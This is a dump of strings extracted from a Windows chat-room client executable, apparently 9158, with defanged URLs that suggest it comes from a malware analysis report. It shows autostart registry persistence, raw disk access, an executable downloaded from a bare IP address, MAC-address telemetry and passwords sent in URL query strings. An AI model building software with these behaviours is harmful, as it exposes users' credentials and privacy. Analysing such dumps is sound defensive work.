?GetBitmapWidth@CAppSysOperation@@QAEHXZ
?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B
?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z
?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z
?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z
?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZ
MVUILib.dll
MSIMG32.dll
MFC42.DLL
MSVCRT.dll
_acmdln
WinExec
GetCPInfo
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEPRO32.DLL
OLEAUT32.dll
WSOCK32.dll
MSVCP60.dll
GdiplusShutdown
gdiplus.dll
publictool.dll
IdleTrac.dll
NETAPI32.dll
SHLWAPI.dll
WINMM.dll
pdh.dll
9158.exe
?GetPassword@CRoomInfo@@QAE?AVCString@@XZ
?GetPort@CRoomInfo@@QAEHXZ
?SetPassword@CRoomInfo@@QAEXPBD@Z
?SetPort@CRoomInfo@@QAEXH@Z
ItemList/Item[ItemName = '%s']/ItemText
ItemList/Item[ItemID = %d]/ItemText
IDispatch error #%d
FSkinRes\HollSplitter.bmp
SkinRes\VIPRoomSkin\row.bmp
%s\%s
%s9158.exe
chatQK.xml
SkinRes\unlock.bmp
dance_room/dance_coffer.aspx
useridx=%s&userpass=%s&type=1
doid=%d&fromid=%d&stepid=%d
%s?url=%s
m_lpNormal->CopyHoleDC(%d, 0, %d, %d)
m_lpActive->CopyHoleDC(0, 0, %d, %d)
%e rcRect(%d,%d,%d,%d)
CBmpProgCtrl..........................................%f*%d = %d
//player.ini
SkinRes\BroadCastBtn.bmp
SkinRes\Broadcastclose.bmp
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
\SkinRes\fragment.bmp
active.ini
.PAVCInternetException@@
itemboxconfig.xml
faceconfig.xml
itemconfig.xml
\Fruit\fruit.xml
Banner.xml
car.xml
\allplat.xml
%s,%ld,%d,%d,%d,%d,%s
DownLoad.exe
\SkinRes\waring.bmp
hXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg
%s(%d)
User32.DLL
SkinRes/DriftingHorn.png
%s&userid=%s&type=%d
\tui_AD.ini
\logincount.ini
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
div.img50 img { max-width:60px; max-height:60px;yqh:expression((this.offsetWidth > this.offsetHeight)?
(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):
(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));
<div class="img50"><img src='%s' /></div></body>
SkinRes\spinbtn_leftright.bmp
SkinRes\flashTab.bmp
SkinRes\flashTabDown.bmp
%d/%d
SkinRes\MoneyTip.bmp
%Y-%m-%d %H:%M:%S %W-%A
%s\*.*
DynamicEffects\LightSticks.db
DynamicEffects\CaiShenImages.db
DynamicEffects\FireworksImages.db
\DynamicEffects.zip
DynamicEffects\DynamicEffects.zip
\\.\PhysicalDrive%d
\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
HallClose.ini
broadHistory.txt
SOFTWARE\9158web\%s
skinres\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
<?xml version="1.0" encoding="GB2312"?>%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:{"uidx":%s,"uid":"%s","usex":%s,"viplevel":%d}^|$|^%s6,%s,%s,0,0
6,%s,%s,%s,%s,%s,%s,%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
skinres\skin.ini
//HallClose.ini
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=1 scrollDelay=2 direction=left></MARQUEE></div></body></html>
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
SOFTWARE\9158web
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
idx=%s&u_name=%s&c_name=%s
tiaoshi: %s===>%s
hXXp://room.9158.com/apps/webloginapi.aspx
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
LastLoginType
DDVLobby.exe
hXXp://60.191.252.121:8081/DDVGL_Setup.exe
broadcastchat.xml
SkinRes\IM.bmp
face\faceconfig.xml
SOFTWARE\9158web\
allplat.xml
SendVideoSpaceMsg.aspx
my.9158.com
userid=%s&nickname=%s&roomid=%s
Text->CareFor(9158)_Step1.listen=>Content:%d
&&Text->CareFor(9158)_Step1.talk=>Content:%d
&&Text->CareFor(9158)_Step1.sing=>Content:%d
?aid=%d
sound//msg.wav
sound//cash.wav
Text->Task_LevelUp.Text1=>Left:85Top:40Content:
&&Text->Task_LevelUp.Text2=>Left:57Top:65Content: %d
Text->QQLogin_Step1.Account=>Content:%d&&Text->QQLogin_Step1.UserName=>Content:%s&&
GiftHorn.xml
AgentHorn.xml
DriftBroadcast.xml
%d(%s);
Serial:%d
====ItemIndex=%d==&&===ItemNum=%d======
hXXp://room.9158.com/KTV_new/help/help_03.htm#18
<MARQUEE ONMOUSEOUT=this.start() ONMOUSEOVER=this.stop() scrollAmount=2 scrollDelay=2 direction=left>
.Marquee{ height:16px; overflow:hidden;}.Marquee div{ width:100%; height:16px; padding-top:0px; padding-bottom: 0px;}active/clicksave/save.aspx
user=%s&level=%d&savet=%d&clickid=%d
MixerXP.dll FAILED
MixerXP.dll
head//star.xml
Head\era.gif
<br><br><div style='font-size:14px;padding:15px'>%s<a href='hXXp://v.9158.com' target='_blank'>
%H:%M:%S
%s\%s.log
hXXp://roommanage.9158.com/active/song_tui/mm_tui.aspx?adstr=%s
hXXp://cugame.9158.com/active/getuserqq/qqinsert.aspx?user=%s&qq=%s&link=%s&stype=ktv
hXXp://room.9158.com/ktv_new/free_mic.aspx?userid=
hXXp://room.9158.com/ktv_new/song_in.aspx?userid=
&r=%d
dance_room_new/click_save.aspx
hXXp://room.9158.com/userroom_add.aspx?roomid=%d&useridx=%s
hXXp://room.9158.com/ktv_new/ktv_tuiroom_in.aspx?parttype=%d
9158.com
tiao58.com
SOFTWARE\t58web
&userid=%s&intype=2&type=%s
&type=%s
<div align=center><img onclick="window.external.FreezeBank(11);" src='
//skinres//Moneyupfreeze.bmp'></div>
//skinres//MoneyRestPass.bmp'>
<img onclick="window.external.FreezeBank(12);" src='
%d-%d-%d %d:%d
hXXp://roommanage.9158.com/active/roomsearch/iproom_new.aspx?pstr=%s&cstr=%s&r=%d
LoginCount
hXXp://room.9158.com/apps/Activity.ashx?act=8&lastime=%s
%s?user=%s&itype=%d
SkinRes\icon_rt.png
<img src="%s" style="float:right;"/>
</strong></p><p> %s</p>
</strong></p><p> %s<a onclick="window.external.GotoGetGift()"; style="float:right; cursor:hand;">
hXXp://cugame.9158.com/active/usersearch_k/message_head.aspx?useridx=%d&head=%s&mess=%s&roomid=%d
hXXp://cugame.9158.com/active/userinfor/head_info.aspx?useridx=%d&r=%d
(*.jpg)|*.jpg||
hXXp://roommanage.9158.com/active/song_tui/code_view.aspx
&jumpurl=
&logkey=
filter.zip
help.xml
serverlist.txt
;padding-left:13px;color:#0177b5;font-size:12px;text-decoration:none}.a2 { display:block;width:180px;height:48px;background:url('#path#\btn_vip1.bmp');background-repeat:no-repeat } .a2:hover { display:block;width:180px;height:48px;background:url('#path#\btn_vip2.bmp');background-repeat:no-repeat }.a3 { display:block;width:180px;height:48px;background:url('#path#\btn_crown1.bmp');background-repeat:no-repeat } .a3:hover { display:block;width:180px;height:48px;background:url('#path#\btn_crown2.bmp');background-repeat:no-repeat }</style><body onMouseOut="window.external.OnMouseHeadOut(1)" onMouseOver="window.external.OnMouseHeadIn(1)" leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none;"></body><style>.myimg{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_vip1.bmp') left no-repeat;} a:hover img{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown2.bmp') left no-repeat;}</style><table background='#path#\vip.jpg' width=100% height=100% border='0' cellspacing='0' cellpadding='0'><tr><td height=300> </td></tr><tr><td height=20> <a href='hXXp://vip.9158.com/ ' target=_blank class=a1>>></a></td></tr><tr><td height=40 align=center valign=top> <a href='javascript:window.external.MsgEnterRoom(100001)' class=a2></a></td></tr></body>
<style>.myimg{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown1.bmp') left no-repeat;} a:hover img{border:0px;display:block;width:180px;height:38px;background:url('#path#\btn_crown2.bmp') left no-repeat;}</style><table background='#path#\crown.jpg' width=100% height=100% border='0' cellspacing='0' cellpadding='0'><tr><td height=300> </td></tr><tr><td height=20> <a href='hXXp://vip.9158.com/ ' target=_blank class=a1>>></a></td></tr><tr><td height=40 align=center valign=top> <a href='javascript:window.external.MsgEnterRoom(100001)' class=a3></a></td></tr></body>
<html xmlns='hXXp://VVV.w3.org/1999/xhtml'><style type='text/css'>.item { position:relative; float:left; height:167px; margin:10px 15px 25px 0px; width:160px; } .item .bottom_bg, .item .del, .item .del2, .item .hide, .item .hide2, .item .line { display:none; } .item .item_bg { background:#dfefff; border:1px solid #d0e8ff; height:165px; } .lock { position:absolute; left:10px; top:10px; } .item_sel .bottom_bg, .item_sel .del, .item_sel .del2, .item_sel .hide, .item_sel .hide2, .item_sel .line { display:block; } .item_sel .item_bg { height:165px; background:#d9ecff; border:1px solid #b4daff; } .bottom_bg { position:absolute; left:0px; top:165px; width:160px; height:27px; background:#b4daff; } .item .hide, .item .del { position:absolute; left:106px; top:172px; color:#27384e; font-size:14px; text-decoration:none; } .item .del { left:22px; } .item .del2 { position:absolute; left:25px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .item .hide2 { position:absolute; left:106px; top:172px; font-size:14px; text-decoration:none; color:#9db8da; cursor:default; } .prev, .next { background:#E7F3FF; border:1px solid #AFD7FF; padding:5px 15px; *padding:5px 15px 4px 15px; color:#004FB6; font-size:14px; text-decoration:none; } .prev2, .next2 { border:1px solid #b7c6d5; color:#8a9fba; cursor:default; }</style><body style='background:#EBF4FF; color:#333; font-size:12px; font-family:arial;'><div style='margin:10px auto 10px; width:99%;'><div><div style='position:relative; z-index:1; background:url(#pic#title_bg.png) repeat-x #c2e0ff; border:1px solid #bee1ff; border-left-color:#b3d7fd; border-right-color:#b3d7fd; border-bottom:none; height:36px; line-height:35px; vertical-align:middle; overflow:hidden;'><div style='position:absolute; z-index:9; left:10px; top:0px; text-align:center; font-size:14px; color:#2D4389; text-decoration:none;'>#sel1#</div><a href="javascript:window.external.OnHistory_Showinfo(1,0)" style='position:absolute; right:10px; 
padding-left:17px; color:#2D4389; text-decoration:none; background:url(#pic#f5.png) no-repeat 0px 10px;'>#p6#/#p3# ' onmousemove="this.className='item item_sel'" onmouseout="this.className='item'"><div class='item_bg' onclick='window.external.OnHistory_Showinfo(2,#pa#)'><div class='img' style='position:absolute; left:0px; top:0px;'><img onerror="this.src='#purl#'" src='#p5#' style='border:none;width:160px;height:120px' /></div><div class='lock' style='display:#p4#'><img src='#pic#lock.png' /></div><div class='text' style='position:absolute; left:10px; top:124px;'><p class='name' style='color:#004fb6; padding:2px 0px; margin:0;'>#p2#</p><p style='color:#475465; padding:0; margin:0;'>#p1#</p></div></div><div class='bottom_bg'></div><span class='line' style='position:absolute; left:80px; top:165px; width:1px; height:27px; boder-left:1px solid #a9ccee; background:#a9ccee;'></span><a #p8#>
hXXp://room.9158.com/ktv_new/myroom_del.aspx?userid=%s&roomid=%s&type=%s
%s-%s|
HistoryRoom.xml
hXXp://room.9158.com/ktv_new/lately_room.aspx?r=
hXXp://room.9158.com/ktv_new/cu_myroom.aspx?userid=
href="javascript:window.external.OnHistory_Showinfo(6,#p9#)" class='next '
href="javascript:window.external.OnHistory_Showinfo(5,#p9#)" class='prev '
')){window.external.OnHistory_Showinfo(4,#pa#);}"\skinres\fav\sel1.gif' style='border:none;'>
hXXp://room.9158.com/images/newten/go-home.gif
#purl#
hXXp://room.9158.com/ktv_new/head1.jpg
class='hide' href="javascript:window.external.OnHistory_Showinfo(3,#pa#)"
\skinres\fav\sel2.gif' style='border:none;'>
iexplore.exe
hXXp://cugame.9158.com/active/app/load.htm
login=
hXXp://VVV.9158.com/client/login/loginback.aspx?
skinres\RankRate.bmp
skinres\Hall\SearchRoomTopRight.bmp
skinres\Hall\SearchRoomTopLeft.bmp
<img width="227" height="67" src="%s">
skinres\Unknown.jpg
skinres\scroll.bmp
\Game\ddvGame.ini
SkinRes//none.bmp
SkinRes\TreeStatus.bmp
SkinRes\Hall\searchRoombtn.bmp
SkinRes\Hall\headbutton.bmp
SkinRes\Hall\MiniInfor.bmp
SkinRes\Hall\bag.bmp
SkinRes\systemCenter.bmp
SkinRes\set.bmp
SkinRes\mybank.bmp
SkinRes\vip.bmp
SkinRes\systemSet.bmp
SkinRes\systemReg.bmp
\SkinRes\IMToolBar.bmp
Head\era.bmp
Head\crown.bmp
Head\topestpurple2.bmp
Head\topestpurple.bmp
Head\DiamondPurple2.bmp
Head\DiamondPurple.bmp
Head\queenPurple2.bmp
Head\queenPurple.bmp
Head\Purple2.bmp
Head\Purple.bmp
Head\purplevip2.bmp
Head\purplevip.bmp
Head\level15.bmp
Head\redvip.bmp
Head\0_bluevip.bmp
Head\paliesman.bmp
onclick="window.external.OnclickHead('1')"><img onMouseOut="window.external.OnMouseHeadOut(0)" onMouseOver="window.external.OnMouseHeadIn(0)" width="60" height="45" src="%s" style=cursor:hand>
hXXp://
Head\user_photo.bmp
hXXp://vip.9158.com/
Head\H5_2.bmp
Head\H5_1.bmp
Head\H4_2.bmp
Head\H4_1.bmp
Head\H3_2.bmp
Head\H3_1.bmp
Head\H2_2.bmp
Head\H2_1.bmp
Head\H1_2.bmp
Head\H1_1.bmp
Head\H0_2.bmp
Head\H0_1.bmp
-L"prdname=9158 idx=%s id=%s nick=%s pwd=%s rinfo=0"
%Y%m%d
%s\%d\%s
SkinRes\BtnMinInfor.bmp
SkinRes\BtnCloseInfor.bmp
%s&uidx=%s
SkinRes\brInfor.bmp
SkinRes\blInfor.bmp
SkinRes\trInfor.bmp
SkinRes\tlInfor.bmp
%s %s
%d||%d||%d||%s
.img50 { width:50px; height:50px; text-align:center; }div.img50 img { max-width:50px; max-height:50px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 50 ? "50px" : "auto"):(this.style.height = this.offsetHeight >= 50 ? "50px" : "auto"));
<body scroll="no" bgcolor=#FEFECC><div class="img50"><img src='%s' /></div></body></html>
%s x%d
skinres\message.bmp
updateitem.dll
hXXp://roommanage.9158.com/room_regin/reg.aspx?introducer=%s&ntype=1&station=%s
%s;%s
LoginDlg
LoginDlg2
//banner//logbg.bmp
SkinRes\admess.bmp
\SkinRes\admess.bmp" width="
<body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 oncontextmenu="window.event.returnValue=false;" style="overflow-x:hidden;overflow-y:hidden;width:100%;border-width=0;border-style:none">
' target='_blank' onFocus='this.blur()'>
\guestlogin.ini
SkinRes\TG\mins1.bmp
//banner//log_min.bmp
SkinRes\TG\closes1.bmp
//banner//log_close.bmp
Hall_LoginMenu
Login_Guest
Hall_LoginCancel
Hall_LoginOK
HallLoginReg
Login_Weibo
Login_Alipay
Login_QR
Login_QQ
Login_idx
Login_User
GuestLogin_Tui
GetLoginNodeData.aspx
dl.week8.net
platname=%s&userid=%s&loginip=%s&loginport=%d
/Error.txt
CLoginDlg m_nLoginType!=nType
hXXp://roommanage.9158.com/active/roomsearch/iproom_in.aspx
SysMsgCloseBtn
skinres\login.gif
hXXp://VVV.9158.com/?code=
SkinRes/IeClose.png
%H : %M %Y/%m/%d
nIDKey
MsgCloseBtn
SockClient.dll
Multi*.dll
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
%sBugReport.exe ,%s
Flags:X
DS:X ES:X FS:X GS:X
SS:ESP:X:X EBP:X
CS:EIP:X:X
EAX:X
EBX:X
ECX:X
EDX:X
ESI:X
EDI:X
Fault address1: X X:X %s
Exception code1: X %s
//build4.5%d-%d-%d %d:%d:%d***************************************************
NTDLL.DLL
FLT_INVALID_OPERATION
FLT_DENORMAL_OPERAND
X X X:X %s
SkinRes\buttonmi.bmp
SkinRes\roomclose.bmp
SkinRes\rightBackground.bmp
SkinRes\leftBackground.bmp
SkinRes\BackgroundRB.bmp
SkinRes\BackgroundLB.bmp
SkinRes\BackgroundRT.bmp
SkinRes\BackgroundLT.bmp
in_coffer_new.aspx
useridx=%s&userpass=%s&type=4&oldbankpass=%s&newbankpass=%s
%s?user=%s&userid=%s
%s&r=%d
CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\CLSID\%s\InprocServer32
SkinRes\shield.bmp
\sndvol.exe
\sndvol32.exe
hXXp://room.9158.com/in_user_roomin.aspx?roomid=100000
VolumeDB:%d, Pole:%d
//91KboxVCamSetup.exe
//9158VCamSetup.exe
//91KboxVCamSetup.exe
91KboxVCamSetup.exe
//9158VCamSetup.exe
9158VCamSetup.exe
C:\2.txt
%s//in_userchange.aspx?%s
in_userchange.aspx
useridx=%s&type=1
in_userchange_new.aspx
type=2&useridx=%s&name=%s&sex=%s&birthday=%s&province=%s&city=%s
type=2&useridx=%s&oldpass=%s&newpass=%s
PersonalSetting_MSG
%sMultiChatGuest.dll
Host not found: %s
%s - WSAError: %ld
ip=%s&nType=%s&insert=%s&idx=%s&ID=%s&promoid=%s&sType=%s&Version=2
EnterTURL
skinres\WaitRoom.gif
\SkinRes\ServerInfo.bmp
useridx=%s&userpass=%s&type=3&bankcash=%d&sepwd=%s
worldbrocast.xml
RankMsgOkBtn
active/affiche/affiche_ktv.aspx
roomgame/get_gameinfo.aspx
hXXp://cugame.9158.com/active/roomapply/apply.aspx
useridx=%s&userpass=%s&type=2&bankcash=%d
SkinRes\Hall\search_text_bg.bmp
SkinRes\Hall\return.bmp
active/roomsearch/im_search_k.aspx
searchstr=%s&useridx=%s
%s%s%s
!%d/%d
<head><style type='text/css'>.photo img { border:none; }.photo { position:relative; width:540px; height:650px; margin:0px auto; }.photo .img, .photo .prev, .photo .next, .photo .down, .photo .share_t,
.photo .share_qzone, .photo .share_weibo { position:absolute; z-index:1; }.photo .img { left:30px; top:0px; width:480px; height:640px; overflow:hidden; }.photo .img .img_in { display:table; width:480px; height:640px; }.photo .img p { display:table-cell; vertical-align:middle; text-align:center; *display:block; *font-size:558px; *font-family:Arial; }.photo .img img { vertical-align:middle; max-height:640px; max-width:480px; }* html .photo .img img {_width: expression(this.offsetWidth > 480 ? '480px': true); }
.photo .prev, .photo .prev:hover,
.photo .next, .photo .next:hover { z-index:3; top:264px; display:block; width:82px; height:82px; cursor:pointer; cursor:hand; }.photo .prev { left:10px; }.photo .prev:hover { }.photo .next { right:10px; _left:445px; }.photo .next:hover { }.photo .down,
.photo .down:hover,
.photo .share_t,
.photo .share_t:hover,
.photo .share_qzone,
.photo .share_qzone:hover,
.photo .share_weibo,
.photo .share_weibo:hover { top:560px; z-index:3; display:block; width:64px; height:60px; cursor:pointer; cursor:hand; }.photo .down { left:350px; }.photo .down:hover { }.photo .share_t { left:120px; }.photo .share_t:hover { }.photo .share_qzone { left:180px; }.photo .share_qzone:hover { }.photo .share_weibo { left:240px; }.photo .share_weibo:hover { }<script type='text/javascript'>window.onerror=function(){return true;}; var m_total=0; var nowpos=-1; var Astrfunction UrlEncode(s) { var hex=''; var i,j,t; j=0; for (i=0; i<s.length; i ) { t = hexfromdec( s.charCodeAt(i) ); if (t=='25') { t=''; } hex = '%' t; } return hex; } function hexfromdec(num) { if (num > 65535) { return ('err!') } first = Math.round(num/4096 - .5); temp1 = num - first * 4096; second = Math.round(temp1/256 -.5); temp2 = temp1 - second * 256; third = Math.round(temp2/16 - .5); fourth = temp2 - third * 16; return (getletter(third) getletter(fourth)); } function getletter(num) { if (num < 10) { return num; } else { if (num == 10) { return 'A'; } if (num == 11) { return 'B'; } if (num == 12) { return 'C'; } if (num == 13) { return 'D'; } if (num == 14) { return 'E'; } if (num == 15) { return 'F'; } } }document.getElementById('showimg').src = Astr[nowpos];function downit(){ window.external.downloadpic(Astr[nowpos]);} function linkit(t){ if(t==1) { window.open('hXXp://share.v.t.qq.com/index.php?c=share&a=index&title=&url=hXXp://VVV.9158.com&appkey=ce15e084124446b9a612a5c29f82f080&site=VVV.9158.com&pic=' Astr2[nowpos]); } if(t==2) { window.open('hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=' Astr2[nowpos] '&title=&summary=&pics=' Astr2[nowpos]); } if(t==3) { window.open('hXXp://service.weibo.com/share/share.php?title=&url=hXXp://VVV.9158.com&source=bookmark&appkey=2992571369&ralateUid=&pic=' Astr2[nowpos]); } }
var arVersion = navigator.appVersion.split('MSIE');if ((version >= 5.5) && (version < 7) && (document.body.filters))
var imgID = (myImage.id) ? "id='" myImage.id "' " : "";
var imgClass = (myImage.className) ? "class='" myImage.className "' " : "";
var imgTitle = (myImage.title) ? "title='" myImage.title "' " : "title='" myImage.alt "'";
var imgStyle = "display:inline-block;" myImage.style.cssText;
var strNewHTML = "<span " imgID imgClass imgTitle " style='" "width:" myImage.width "px; height:" myImage.height "px;" imgStyle ";" "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader" "(src='" myImage.src "', sizingMethod='scale');'></span>";
myImage.outerHTML = strNewHTML;
window.onload=function(){<a href='#prev' onmouseover='javascript:prev.src="#path#prev2.png"' onmouseout='javascript:prev.src="#path#prev.png"' onclick='javascript:imgchange(0)' class='prev' title='
'><img id='prev' src='#path#prev.png' onload='fixPNG(this)' /></a>
<a href='#next' onmouseover='javascript:next.src="#path#next2.png"' onmouseout='javascript:next.src="#path#next.png"' onclick='javascript:imgchange(1)' class='next' title='
'><img id='next' class='img_png' src='#path#next.png' onload='fixPNG(this)' /></a>
<a href='#down' onclick='downit()' ondblclick='' onmouseover='javascript:down.src="#path#down2.png"' onmouseout='javascript:down.src="#path#down1.png"' class='down' title='
'><img id='down' class='img_png' src='#path#down1.png' onload='fixPNG(this)' /></a>
<a href='#share_t' onclick='linkit(1);' onmouseover='javascript:share_t.src="#path#share_t2.png"' onmouseout='javascript:share_t.src="#path#share_t1.png"' class='share_t' title='
'><img id='share_t' class='img_png' src='#path#share_t1.png' onload='fixPNG(this)' /></a>
<a href='#share_qzone' onclick='linkit(2);' onmouseover='javascript:share_qzone.src="#path#share_qzone2.png"' onmouseout='javascript:share_qzone.src="#path#share_qzone1.png"' class='share_qzone' title='
'><img id='share_qzone' class='img_png' src='#path#share_qzone1.png' onload='fixPNG(this)' /></a>
<a href='#share_weibo' onclick='linkit(3);' onmouseover='javascript:share_weibo.src="#path#share_weibo2.png"' onmouseout='javascript:share_weibo.src="#path#share_weibo1.png"' class='share_weibo' title='
'><img id='share_weibo' class='img_png' src='#path#share_weibo1.png' onload='fixPNG(this)' /></a></div>
nowpos=%d;imgchange(1);</script>
Astr[m_total]='%s'; Astr2[m_total]='%s'; m_total ;
SkinRes/GiftBox.bmp
SkinRes\getmoney.bmp
SkinRes\buttonclose.bmp
Button%d
%s List of controls follows:
%s Number of controls: %lu
%s Number of channels: %lu
%s Number of source lines associated with destination line: %lu
%s Manufacturer and product IDs: %u -- %u (see mmreg.h or help subject: "Manufacturer and Product Identifiers")
%s Target name: %s
%s Target type: %lu --
%s Audio line is active. signal is probably passing through the line.
%s Audio line is disconnected.
%s Audio line is an audio source line associated with a single audio destination line.
%s Short Name: %s
%s Name: %s
%s Audio line is a source originating from the waveform-audio output digital-to-analog converter (DAC).
%s MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT
%s Audio line is a source originating from an incoming telephone line.
%s MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE
%s Audio line is a source originating from the output of an internal synthesizer.
%s MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER
%s Audio line is a source originating from personal computer speaker.
%s MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER
%s Audio line is a microphone recording source.
%s MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE
%s Audio line is a line-level source (for example, line-level input from an external stereo).
%s MIXERLINE_COMPONENTTYPE_SRC_LINE
%s Audio line is a digital source (for example, digital output from a DAT or audio CD).
%s MIXERLINE_COMPONENTTYPE_SRC_DIGITAL
%s Audio line is a source originating from the output of an internal audio CD.
%s MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC
%s Audio line is a source originating from the auxiliary audio line.
%s MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY
%s Audio line is an analog source (for example, analog output from a video-cassette tape).
%s MIXERLINE_COMPONENTTYPE_SRC_ANALOG
%s Audio line is a source that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED
%s Audio line is a destination that will be the final recording source for voice input.
%s MIXERLINE_COMPONENTTYPE_DST_VOICEIN
%s Audio line is a destination that will be the final recording source for the waveform-audio input (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_WAVEIN
%s Audio line is a destination that will be routed to a telephone line.
%s MIXERLINE_COMPONENTTYPE_DST_TELEPHONE
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive headphones.
%s MIXERLINE_COMPONENTTYPE_DST_HEADPHONES
%s Audio line is an adjustable (gain and/or attenuation) destination intended to drive speakers.
%s MIXERLINE_COMPONENTTYPE_DST_SPEAKERS
%s Audio line is a destination used for a monitor.
%s MIXERLINE_COMPONENTTYPE_DST_MONITOR
%s Audio line is a line level destination that will be the final recording source for the analog-to-digital converter (ADC).
%s MIXERLINE_COMPONENTTYPE_DST_LINE
%s Audio line is a destination that cannot be defined by one of the standard component types.
%s MIXERLINE_COMPONENTTYPE_DST_UNDEFINED
%s Audio line is a digital destination (for example, digital input to a DAT or CD audio device).
%s MIXERLINE_COMPONENTTYPE_DST_DIGITAL
%s Line type :
%s -----------------------------------------------------------------------
%s Name: %d
%s -------------- Item %d -------------
%s Number of items per channel: %d
%s - Multiple control. The control has two or more possible settings.
%s - Control is disabled
%s - Uniform control
%s Status and support flags:
%s - Steps: %lu
%s - Max: %lu
%s - Min: %lu
%s - Max: %ld
%s - Min: %ld
%s Custom control
%s Name: %s
%s Short Name: %s
%s -----------------------------------------------------------------
%s Control type:
%s ---------------------------- Control ----------------------------
== Source line. Index = %d ===========================================================
** Destination line. Index = %d *******************************************************************
You will pass these to the Init() functions of the various CMixerBase-derived classes
Number of destination lines: %d
Name of device: %s
..............nVolume:%d
dBFS..............%d,%d
%Y/%m/%d/%H:%M:%S
------UrlAnalyzeEdit---Error---
<a target='_blank' href='%s'>%s</a>
\9158.exe
%d/%d(
SkinRes\X.bmp
useridx=%s&userpass=%s&type=5&sepwd=%s
